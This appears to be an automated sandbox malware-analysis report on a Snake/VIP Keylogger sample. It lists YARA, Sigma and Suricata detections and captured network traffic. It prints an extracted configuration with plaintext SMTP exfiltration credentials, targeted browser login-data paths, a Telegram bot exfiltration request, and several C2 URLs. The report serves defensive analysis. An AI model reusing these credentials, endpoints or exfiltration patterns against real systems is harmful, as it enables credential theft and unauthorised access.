2.2.svchost.exe.3374f2e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.3374f2e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.3374f2e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.3.svchost.exe.326ef20.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.326ef20.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.3.svchost.exe.326ef20.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.326ef20.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.326ef20.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.3.svchost.exe.326ef20.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.326ef20.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.2.svchost.exe.7b40000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7b40000.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7b40000.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7b40000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33943:$a1: get_encryptedPassword 0x33917:$a2: get_encryptedUsername 0x339db:$a3: get_timePasswordChanged 0x338f3:$a4: get_passwordField 0x33959:$a5: set_encryptedPassword 0x33726:$a7: get_logins 0x2f064:$a10: KeyLoggerEventArgs 0x2f033:$a11: KeyLoggerEventArgsEventHandler 0x337fa:$a13: _encryptedPassword
2.2.svchost.exe.7b40000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d696:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cd39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf96:$a4: \Orbitum\User Data\Default\Login Data 0x3d975:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7b40000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x314cf:$s1: UnHook 0x3146b:$s2: SetHook 0x314a4:$s3: CallNextHook 0x31433:$s4: _hook
2.3.svchost.exe.326e000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.326e000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.326e000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.326e000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33943:$a1: get_encryptedPassword 0x33917:$a2: get_encryptedUsername 0x339db:$a3: get_timePasswordChanged 0x338f3:$a4: get_passwordField 0x33959:$a5: set_encryptedPassword 0x33726:$a7: get_logins 0x2f064:$a10: KeyLoggerEventArgs 0x2f033:$a11: KeyLoggerEventArgsEventHandler 0x337fa:$a13: _encryptedPassword
2.3.svchost.exe.326e000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d696:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cd39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf96:$a4: \Orbitum\User Data\Default\Login Data 0x3d975:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.326e000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x314cf:$s1: UnHook 0x3146b:$s2: SetHook 0x314a4:$s3: CallNextHook 0x31433:$s4: _hook
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.3374f2e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.3374f2e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
Click to see the 76 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\vnV17JImCH.exe", CommandLine: "C:\Users\user\Desktop\vnV17JImCH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\vnV17JImCH.exe", ParentImage: C:\Users\user\Desktop\vnV17JImCH.exe, ParentProcessId: 6576, ParentProcessName: vnV17JImCH.exe, ProcessCommandLine: "C:\Users\user\Desktop\vnV17JImCH.exe", ProcessId: 6636, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\vnV17JImCH.exe", CommandLine: "C:\Users\user\Desktop\vnV17JImCH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\vnV17JImCH.exe", ParentImage: C:\Users\user\Desktop\vnV17JImCH.exe, ParentProcessId: 6576, ParentProcessName: vnV17JImCH.exe, ProcessCommandLine: "C:\Users\user\Desktop\vnV17JImCH.exe", ProcessId: 6636, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:41:01.387210+0100	2803305	3	Unknown Traffic	192.168.2.12	49712	104.21.80.1	443	TCP
2025-01-10T23:41:04.014064+0100	2803305	3	Unknown Traffic	192.168.2.12	49716	104.21.80.1	443	TCP
2025-01-10T23:41:07.499147+0100	2803305	3	Unknown Traffic	192.168.2.12	49718	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:40:59.672623+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49710	158.101.44.242	80	TCP
2025-01-10T23:41:00.797657+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49710	158.101.44.242	80	TCP
2025-01-10T23:41:02.233512+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49713	158.101.44.242	80	TCP
2025-01-10T23:41:03.454266+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49715	158.101.44.242	80	TCP
2025-01-10T23:41:16.266502+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49720	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:41:19.288540+0100	1810007	1	Potentially Bad Traffic	192.168.2.12	63815	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}
Source: 2.2.svchost.exe.7be0000.4.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: vnV17JImCH.exe	Virustotal: Detection: 30%			Perma Link
Source: vnV17JImCH.exe	ReversingLabs: Detection: 82%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: vnV17JImCH.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: vnV17JImCH.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.12:49711 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:63815 version: TLS 1.2

Source:	Binary string: _.pdb source: svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: vnV17JImCH.exe, 00000000.00000003.2353830803.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, vnV17JImCH.exe, 00000000.00000003.2351340509.0000000004340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: vnV17JImCH.exe, 00000000.00000003.2353830803.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, vnV17JImCH.exe, 00000000.00000003.2351340509.0000000004340000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00F0445A
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0C6D1 FindFirstFileW,FindClose,	0_2_00F0C6D1
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00F0C75C
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F0EF95
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F0F0F2
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F0F3F3
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F037EF
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F03B12
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F0BCBC

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 077AFCD4h	2_2_077AFA28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F831FEh	2_2_08F82DE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F82C34h	2_2_08F82980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F80D10h	2_2_08F80B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8169Ah	2_2_08F80B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8E794h	2_2_08F8E4E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8E33Ch	2_2_08F8E090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_08F80856
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_08F80040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8DEE4h	2_2_08F8DC38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8F49Ch	2_2_08F8F1F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F831FEh	2_2_08F82DDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8F044h	2_2_08F8ED98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8EBECh	2_2_08F8E940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F831FEh	2_2_08F8312C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8FD4Ch	2_2_08F8FAA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_08F80676
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8F8F4h	2_2_08F8F648
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8DA8Ch	2_2_08F8D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8D634h	2_2_08F8D388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 08F8D1DCh	2_2_08F8CF30

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.12:63815 -> 149.154.167.220:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 158.101.44.242 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.80.1 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.12:63811 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2011/01/2025%20/%2015:13:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49713 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49710 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49720 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49715 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49716 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49712 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49718 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.12:49711 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00F122EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2011/01/2025%20/%2015:13:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:41:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
